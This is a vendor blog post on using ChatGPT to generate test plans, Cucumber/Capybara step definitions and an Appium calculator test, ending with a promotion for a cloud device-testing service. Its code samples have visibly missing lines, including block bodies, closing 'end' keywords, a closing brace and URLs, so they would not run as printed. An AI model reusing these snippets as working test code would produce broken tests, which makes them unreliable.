How to Use ChatGPT in Your Automated Tests

  May 12, 2023

How to Use ChatGPT in Your Automated Tests

OpenAI's ChatGPT has become the fastest-growing app of all time – and if you've tried it, that probably doesn't come as a surprise! 

ChatGPT has become popular for everything from creative tasks like writing a poem to technical tasks like writing code. Meanwhile, the business world is quickly discovering its ability to summarize complex data sets or perform complicated analyses. But, of course, these use cases are just scratching the surface of what may be possible long term. 

Many developers are already using ChatGPT and related technologies (like GitHub Copilot) to generate code. But these solutions are especially beneficial for junior developers or those new to automated tests – not just those with advanced scripting knowledge. 

In this article, you'll learn how ChatGPT works under the hood, how developers leverage this breakthrough technology, and how it can help automate tedious testing workflows. 

What is ChatGPT? 

Large language models (LLMs) represent the most significant artificial intelligence breakthrough since deep learning. These models learn to recognize language patterns using machine learning concepts and vast datasets. As a result, they can predict responses in a grammatically correct and meaningful way for humans. 

screenshot showing code
How ChatGPT works on a lower level. Source: OpenAI

The same concepts LLMs use to learn words and grammar structures apply to code and application architecture. In other words, ChatGPT and other LLMs can predict how code should look using the same techniques it uses to predict how sentences should look. As a result, these tools have become tremendously popular among developers. 

Some common developer use cases include:

  • Writing or Refactoring Code – ChatGPT can write code based on a user's instructions. And unlike past bots, ChatGPT can handle complex requirements, like building a WordPress plugin.
  • Explaining Code or Concepts  – ChatGPT can help developers better understand how a piece of code works or the rationale behind writing a piece of code in a certain way.
  • Generating Tests & Documentation – ChatGPT can write test cases, test scripts, or documentation for a piece of code, helping developers automate tedious workflows.
  • Identifying Best Practices – ChatGPT can help developers think through different scenarios and adhere to best practices when considering different architectures or data models. 

These capabilities can help developers eliminate busy work and improve their productivity. At the same time, they can help junior developers answer low-level questions without pulling senior engineers away from their work, saving time and resources. And finally, they can help all engineers think through problems in new ways. 

Important Caveats 

Large language models (LLMs) have come a long way over the past few years but they aren't perfect. They only have fixed knowledge about the world up to a certain date and aren’t up to date with current documentation. They also lack the nuance to properly respond to every input.

For example, ChatGPT struggles with basic math and logic, doesn’t understand many jokes, and may fabricate information. In addition, researchers have found significant bias in LLMs, which could prove dangerous in some circumstances.

ChatGPT is also susceptible to prompt injection attacks, where markdown images or other techniques can steal chat data. As a result, there are some security-related concerns about ChatGPT and other LLMs that could prove a barrier to some professional use.

How to Use ChatGPT for Automation 

The code-writing capabilities of ChatGPT are well-documented, with countless examples of everything from simple plugins to entire websites built by the chatbot. But, while ChatGPT still requires hand-holding when writing code, it's exceptional at building test cases, writing test scripts, and helping developers embrace testing best practices. 

Creating Test Cases 

Suppose that you're responsible for creating a test plan. With a simple prompt and a few bullet points, ChatGPT can create an in-depth test plan consisting of setup instructions and multiple test cases. You can even instruct ChatGPT to prepare a test case table to enter into Jira tickets, which results in a copy-and-pastable table!

Writing Test Scripts 

Suppose you want to write a unit test for an existing code. By copying the code snippet into ChatGPT, you can ask for a unit test for the code, and it will create a test based on the inferred context. You can insert these tests into a test automation process (e.g., your CI/CD processes) and prevent future regressions. 

Explaining Test Results 

If you run the test script generated in the previous section and receive an error, you can copy and paste it into ChatGPT, and it will create an explanation. Additionally, the conversational format of ChatGPT means you can also ask follow-up questions. These same capabilities can help developers fix bugs. 

Creating Test Summaries 

Suppose you have a list of test results and want to summarize the results for a team lead or stakeholder. You can ask ChatGPT to summarize the results in a narrative format for a particular audience (e.g., technical or non-technical). Or, you can request that ChatGPT put the results into a table that may form part of a more extensive report. 

Examples in Action 

Let's start by generating a BDD scenario using Cucumber and a domain-specific language (DSL) called Gherkin. These specifications are machine and human-readable to improve communication between testers, developers, and non-technical business people. 

We can start with the prompt: "Generate a test case using Cucumber for Google Search." 

Note: You could replace "Google Search" with a description of your feature or functionality. 

    Feature: Google Search Engine 

    Scenario: User performs a successful search 

    As a user who wants to find information quickly 

    I want to search using Google's search engine 

    So that I can find relevant results easily 

    Given I am on the Google homepage 

    When I enter a "cucumber testing" query into the search bar 

    And I click the "Search" button 

    Then I should see search results related to "cucumber testing" 

    And the first result should have a title containing "Cucumber" 

    And the first result should have a URL containing ""

Next, we can generate specific test steps using the prompt: "Implement these steps using Cucumber's step definitions." 

Note: These step definitions are written in Ruby using the Capybara library, but you can specify any language or framework you want. 

require 'capybara/cucumber' 

Given("I am on the Google homepage") do 



When("I enter a {string} query into the search bar") do |search_term| 

    fill_in("q", with: search_term) 


And("I click the {string} button") do |button_name| 



Then("I should see search results related to {string}") do |search_term| 

    expect(page).to have_content(search_term) 


And("the first result should have a title containing {string}") do |title_substring| 

    first_result_title = find(".g:first-child .LC20lb.DKV0Md").text 

expect(first_result_title).to include(title_substring) 


And("the first result should have a URL containing {string}") do |url_substring| 

    first_result_url = find(".g:first-child .yuRUbf a")[:href] 

    expect(first_result_url).to include(url_substring) 


And voila, you have an executable BDD specification that you can use to ensure an application performs as expected.

You can also use ChatGPT to create unit tests. For example, if you wanted to test a mobile calculator app's addition and subtraction functions using Appium, specify the prompt: "Write an Appium test for a mobile calculator app with an addition and subtraction button." 

import unittest 

from appium import webdriver 

from appium.webdriver.common.mobileby import MobileBy 

class CalculatorAppTest(unittest.TestCase): 

    def setUp(self): 

        desired_capabilities = { 

            "platformName": "Android", 

            "deviceName": "Android Emulator", 

            "app": "/path/to/your/calculator.apk", 

            "automationName": "UiAutomator2" 


        self.driver = webdriver.Remote("", desired_capabilities) 

    def tearDown(self): 


    def test_addition(self): 

        number1 = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "number1") 

        number2 = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "number2") 



        add_button = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "addButton")  

        result = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "result") 

        self.assertEqual(result.text, "8") 

    def test_subtraction(self): 

        number1 = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "number1") 

        number2 = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "number2") 



        subtract_button = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "subtractButton")  

        result = self.driver.find_element(MobileBy.ACCESSIBILITY_ID, "result") 

        self.assertEqual(result.text, "3") 

if __name__ == "__main__": 


These tests are relatively accurate and ready to execute virtually as-is. While you may need to engineer prompts to get the best results or modify the results to suit your project better, ChatGPT is sufficient to get your tests 90% of the way there. As a result, senior engineers can save time, and junior engineers can simplify their job.

Scaling Tests Across Devices 

Creating test cases and scripts with the help of ChatGPT can dramatically improve test coverage. But these tests don’t guarantee functionality across devices, operating systems, and browsers. A robust test suite requires testing across multiple devices and platforms that reflect your users’ real-life patterns. 

BitBar provides an easy-to-use cloud-based platform for end-to-end tests. Rather than maintaining an in-house device lab, you can leverage hundreds of real devices in the cloud and run tests across operating systems and browsers. That way, you can confidently deploy code, knowing it will work across all environments. 

screenshot showing code
BitBar’s device cloud provides access to thousands of configurations to make your tests as accurate as possible. Source: SmartBear

The platform makes it easy to incorporate browser-based and mobile testing within your existing CI/CD pipeline. BitBar supports popular frameworks like Selenium, Appium, and Cypress. You can also use parallel testing to speed up your test suite without sacrificing test quality or coverage. Manual testers can provision cloud-based devices for exploratory and other manual testing tasks. 

The Bottom Line 

ChatGPT and other LLMs can significantly improve developer productivity, opening the door to new possibilities. In particular, they can help automate the creation of test cases and scripts, making it possible to expand test coverage and quality. And with GitHub Copilot and other tools in active development, these capabilities will only grow in the future.

If you want to scale tests across real devices and browsers: